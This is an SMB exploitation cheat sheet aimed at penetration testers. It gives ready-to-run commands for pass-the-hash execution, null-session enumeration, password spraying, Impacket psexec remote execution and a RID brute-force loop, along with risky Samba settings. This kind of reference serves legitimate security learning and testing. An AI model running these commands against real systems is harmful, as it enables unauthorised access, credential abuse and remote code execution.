SMB
SMB Security & Exploitation Guide
1. About SMB
Server Message Block (SMB) is a client server protocol that provides shared access to:
Files and directories
Printers
Routers and interfaces
It enables communication between nodes in the same network, granting access to resources based on authentication and permissions.
Default Ports:
NetBIOS over TCP: 137, 138, 139
Direct SMB (CIFS): 445
2. Tools for SMB Interaction
CrackMapExec (CME)
A powerful tool for SMB enumeration and exploitation.
Pass-the-Hash or Command Execution:
crackmapexec smb 192.0.2.10 -u Administrator -d . -H <NTLM_HASH> -x whoami
Null-session login and share enumeration:
crackmapexec smb 203.0.113.5 -u '' -p '' --shares
Userlist checking:
crackmapexec smb 198.51.100.20 -u users.txt -p '' -d . --continue-on-success
User=Password spray attack:
crackmapexec smb 198.51.100.20 -u users.txt -d . --no-bruteforce --continue-on-success
Samba
An open-source implementation of SMB/CIFS on Unix-based systems.
Configuration file:
/etc/samba/smb.conf
Check active connections:
smbstatus
Inspect config (excluding comments):
cat /etc/samba/smb.conf | grep -v "#\|\;"
smbclient
A command-line tool to interact with SMB shares.
List available shares (null session):
smbclient -N -L //192.0.2.10
Connect to a share:
smbclient -U username \\\\192.0.2.10\\share
Useful commands:
help
→ show available commandsls
→ list filesget <file>
→ download a file!<cmd>
→ run local system command
SMBMap
Automation tool for SMB enumeration and file operations.
Basic enum:
smbmap -H 192.0.2.10
Recursive enum:
smbmap -H 192.0.2.10 -r share
Download a file:
smbmap -H 192.0.2.10 --download "share/example.txt"
Upload a file:
smbmap -H 192.0.2.10 --upload example.txt "share/example.txt"
Impacket Tools
Impacket provides Python scripts for SMB interaction and exploitation.
SMB client:
impacket-smbclient 'rio@corp.local' -no-pass
Run SMB server:
sudo impacket-smbserver share ./ -smb2support
Remote code execution:
impacket-psexec administrator:'mypass@123'@192.0.2.10
(Same applies for
smbexec
andatexec
.)
RPCclient
RPC (Remote Procedure Call) allows process-to-process communication across systems.
Connect (null session):
rpcclient -U "" 192.0.2.10
Invoke commands:
rpcclient $> enumdomusers rpcclient $> queryuser <RID>
RID Brute Force (users/groups enumeration):
for i in $(seq 500 1100); do \ rpcclient -N -U "" 192.0.2.10 -c "queryuser 0x$(printf '%x\n' $i)" \ | grep "User Name\|user_rid\|group_rid" && echo ""; done
Alternative: use samrdump.py, enum4linux, or enum4linux-ng:
./enum4linux-ng.py 192.0.2.10 -A
Windows Net Command
net use \\DC01\ipc$ "" /u:""
3. Dangerous SMB Configuration Settings
browseable = yes
→ Shares are visible in network browsing.read only = no
→ Users can create and modify files.writable = yes
→ Full write permissions allowed.guest ok = yes
→ Anonymous logins permitted.enable privileges = yes
→ Honors user privileges (may be abused).create mask = 0777
→ New files created with world read/write permissions.directory mask = 0777
→ New directories created with world read/write permissions.logon script = script.sh
→ Executes script at user login.magic script = script.sh
/magic output = script.out
→ Dangerous auto-execution functionality.
4. Creating a Share (Windows 10 Example)
Create a folder.
Use Advanced Sharing to share the folder.
Configure both SMB share permissions and NTFS permissions.
SMB permissions control network access.
NTFS permissions control file system access.
Inherited permissions are marked grey (from parent directory).
5. Mounting SMB Shares (Linux)
sudo mount -t cifs -o username=rio,password=rio@123 //192.0.2.10/Sharename /home/user/Desktop/
Last updated